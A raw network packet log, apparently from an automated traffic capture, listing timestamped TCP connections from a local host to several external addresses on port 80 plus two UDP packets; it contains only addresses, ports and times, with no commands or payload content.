Jun 3, 2024 08:54:20.741514921 CEST	49192	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:20.846231937 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.856062889 CEST	49192	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:21.867566109 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:21.872513056 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:21.872566938 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:21.872911930 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:21.877758026 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.202323914 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.202339888 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.202435017 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:23.202512980 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.202534914 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.202693939 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:23.202786922 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.202821970 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.202847958 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.202867985 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:23.203605890 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.203643084 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.203671932 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:23.203752995 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.203823090 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:23.207324982 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.215679884 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.215958118 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:23.319298983 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.380530119 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:23.382215977 CEST	80	49193	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:23.382843971 CEST	49193	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:24.395961046 CEST	49194	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:24.400908947 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:24.404037952 CEST	49194	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:24.404314041 CEST	49194	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:24.409183979 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:24.409295082 CEST	49194	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:24.409394979 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:24.414232969 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:24.414284945 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.720773935 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.720793009 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.720813036 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.720825911 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.720839977 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.720921993 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.720933914 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.720953941 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.720966101 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.722362041 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.725528002 CEST	49194	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:25.730511904 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.730544090 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.730554104 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.730581045 CEST	49194	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:25.837395906 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.897075891 CEST	80	49194	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:25.897120953 CEST	49194	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:25.907677889 CEST	49194	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:26.922429085 CEST	49195	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:26.927381039 CEST	80	49195	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:26.928090096 CEST	49195	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:26.931967974 CEST	49195	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:26.936795950 CEST	80	49195	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:28.272857904 CEST	80	49195	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:28.448687077 CEST	80	49195	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:28.452090025 CEST	49195	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:28.452161074 CEST	49195	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:28.457098007 CEST	80	49195	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:41.706147909 CEST	49196	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:41.711031914 CEST	80	49196	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:41.711086988 CEST	49196	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:41.711348057 CEST	49196	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:41.716433048 CEST	80	49196	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:41.716442108 CEST	80	49196	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:41.716487885 CEST	49196	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:41.721312046 CEST	80	49196	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:42.369432926 CEST	80	49196	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:42.372051001 CEST	49196	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:43.223979950 CEST	49196	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:43.228998899 CEST	80	49196	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:44.238225937 CEST	49197	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:44.243297100 CEST	80	49197	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:44.244237900 CEST	49197	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:44.244237900 CEST	49197	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:44.249248028 CEST	80	49197	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:44.894191027 CEST	80	49197	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:44.894330978 CEST	49197	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:45.753854036 CEST	49197	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:45.758928061 CEST	80	49197	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:46.795212030 CEST	49198	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:46.800246954 CEST	80	49198	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:46.804420948 CEST	49198	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:46.804420948 CEST	49198	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:46.809377909 CEST	80	49198	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:46.809457064 CEST	80	49198	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:46.812056065 CEST	49198	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:46.816962004 CEST	80	49198	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:46.817056894 CEST	80	49198	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:47.463886976 CEST	80	49198	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:47.465223074 CEST	49198	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:48.309343100 CEST	49198	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:48.314285994 CEST	80	49198	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:49.323690891 CEST	49199	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:49.328732014 CEST	80	49199	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:49.328782082 CEST	49199	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:49.329011917 CEST	49199	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:49.333836079 CEST	80	49199	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:50.075663090 CEST	80	49199	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:50.075728893 CEST	80	49199	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:50.075767040 CEST	80	49199	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:50.075798035 CEST	80	49199	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:50.075881958 CEST	49199	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:50.110743999 CEST	80	49199	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:50.110830069 CEST	49199	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:50.110861063 CEST	49199	80	192.168.2.22	208.91.197.13
Jun 3, 2024 08:54:50.115761995 CEST	80	49199	208.91.197.13	192.168.2.22
Jun 3, 2024 08:54:55.154884100 CEST	49200	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:55.159861088 CEST	80	49200	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:55.159981012 CEST	49200	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:55.160303116 CEST	49200	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:55.165218115 CEST	80	49200	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:55.165457964 CEST	80	49200	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:55.165553093 CEST	49200	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:55.170469999 CEST	80	49200	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:56.037775993 CEST	80	49200	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:56.160674095 CEST	80	49200	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:56.160737038 CEST	49200	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:56.671986103 CEST	49200	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:57.685194016 CEST	49201	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:57.690170050 CEST	80	49201	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:57.690231085 CEST	49201	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:57.690455914 CEST	49201	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:57.695333958 CEST	80	49201	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:58.563519001 CEST	80	49201	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:58.689712048 CEST	80	49201	84.33.215.91	192.168.2.22
Jun 3, 2024 08:54:58.692053080 CEST	49201	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:54:59.213778973 CEST	49201	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:00.228101015 CEST	49202	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:00.233247042 CEST	80	49202	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:00.233325005 CEST	49202	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:00.233598948 CEST	49202	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:00.238513947 CEST	80	49202	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:00.238595963 CEST	49202	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:00.238722086 CEST	80	49202	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:00.243601084 CEST	80	49202	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:00.243706942 CEST	80	49202	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:01.090895891 CEST	80	49202	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:01.216620922 CEST	80	49202	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:01.217371941 CEST	49202	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:01.741097927 CEST	49202	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:02.755276918 CEST	49203	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:02.760325909 CEST	80	49203	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:02.764327049 CEST	49203	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:02.764327049 CEST	49203	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:02.769330025 CEST	80	49203	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:03.639821053 CEST	80	49203	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:03.764870882 CEST	80	49203	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:03.764964104 CEST	49203	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:03.765003920 CEST	49203	80	192.168.2.22	84.33.215.91
Jun 3, 2024 08:55:03.770070076 CEST	80	49203	84.33.215.91	192.168.2.22
Jun 3, 2024 08:55:08.784321070 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:08.789191961 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:08.792081118 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:08.792428970 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:08.797293901 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:08.797491074 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:08.799312115 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:08.804332018 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.857387066 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.857412100 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.857424021 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.857455015 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:09.857503891 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.857517958 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.857543945 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:09.858501911 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.858513117 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.858537912 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:09.858558893 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.858593941 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:09.858633995 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.858647108 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.858678102 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:09.862579107 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.981503010 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.981559038 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:09.982171059 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.982235909 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.982248068 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.982273102 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:09.982476950 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.982517004 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:09.982578039 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.983398914 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.983433962 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:09.984666109 CEST	80	49204	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:09.984705925 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:10.307996988 CEST	49204	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:11.319592953 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:11.324522972 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:11.324817896 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:11.324817896 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:11.329706907 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618693113 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618729115 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618742943 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618757010 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618768930 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618802071 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:12.618802071 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:12.618866920 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618937016 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618948936 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618961096 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618973017 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.618982077 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:12.618993998 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:12.623646975 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.623672962 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.623791933 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:12.740304947 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.740353107 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.741329908 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.741348982 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.741421938 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.741466999 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:12.741528034 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.741605043 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:12.743763924 CEST	80	49205	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:12.743848085 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:12.832714081 CEST	49205	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:13.846812010 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:13.851833105 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:13.851897001 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:13.852524996 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:13.857420921 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:13.857470036 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:13.857548952 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:13.862401009 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:13.862433910 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.864710093 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.864775896 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.864814997 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.864850998 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.864885092 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.864886999 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:14.864923000 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.865010977 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:14.865556955 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.865659952 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.865696907 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.865762949 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.865782976 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:14.869951010 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.869987011 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:14.870131969 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:15.359961987 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010078907 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010113955 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010128975 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010130882 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010143042 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010154009 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010166883 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010170937 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010179996 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010185957 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010205030 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010215998 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010271072 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010284901 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010297060 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010308981 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010318041 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010334015 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.010370016 CEST	80	49206	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.010401964 CEST	49206	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.375994921 CEST	49207	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.381350994 CEST	80	49207	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:16.384073019 CEST	49207	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.387996912 CEST	49207	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:16.392827988 CEST	80	49207	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:17.323388100 CEST	80	49207	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:17.325355053 CEST	80	49207	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:17.325429916 CEST	49207	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:17.325515032 CEST	49207	80	192.168.2.22	172.67.182.131
Jun 3, 2024 08:55:17.330389977 CEST	80	49207	172.67.182.131	192.168.2.22
Jun 3, 2024 08:55:22.400136948 CEST	49208	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:22.406449080 CEST	80	49208	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:22.408083916 CEST	49208	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:22.410810947 CEST	49208	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:22.417088985 CEST	80	49208	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:22.417256117 CEST	80	49208	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:22.417377949 CEST	49208	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:22.422275066 CEST	80	49208	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:23.908713102 CEST	49208	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:23.914170027 CEST	80	49208	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:23.914263010 CEST	49208	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:24.922835112 CEST	49209	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:24.927756071 CEST	80	49209	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:24.928267956 CEST	49209	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:24.928268909 CEST	49209	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:24.933089018 CEST	80	49209	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:26.435815096 CEST	49209	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:26.441174030 CEST	80	49209	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:26.441422939 CEST	49209	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:27.450048923 CEST	49210	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:27.455113888 CEST	80	49210	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:27.455185890 CEST	49210	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:27.455495119 CEST	49210	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:27.460360050 CEST	80	49210	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:27.460438967 CEST	49210	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:27.460453987 CEST	80	49210	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:27.465631008 CEST	80	49210	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:27.465697050 CEST	80	49210	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:28.963042974 CEST	49210	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:28.968305111 CEST	80	49210	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:28.968375921 CEST	49210	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:29.977307081 CEST	49211	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:29.982285976 CEST	80	49211	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:29.982362986 CEST	49211	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:29.982644081 CEST	49211	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:29.987498045 CEST	80	49211	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:31.626583099 CEST	80	49211	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:31.626599073 CEST	80	49211	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:31.626866102 CEST	49211	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:31.825817108 CEST	80	49211	93.127.187.187	192.168.2.22
Jun 3, 2024 08:55:31.826150894 CEST	49211	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:31.826150894 CEST	49211	80	192.168.2.22	93.127.187.187
Jun 3, 2024 08:55:31.831964016 CEST	80	49211	93.127.187.187	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 3, 2024 08:51:16.134476900 CEST	138	138	192.168.2.22	192.168.2.255
Jun 3, 2024 08:51:22.822612047 CEST	54562	53	192.168.2.22	8.8.8.8
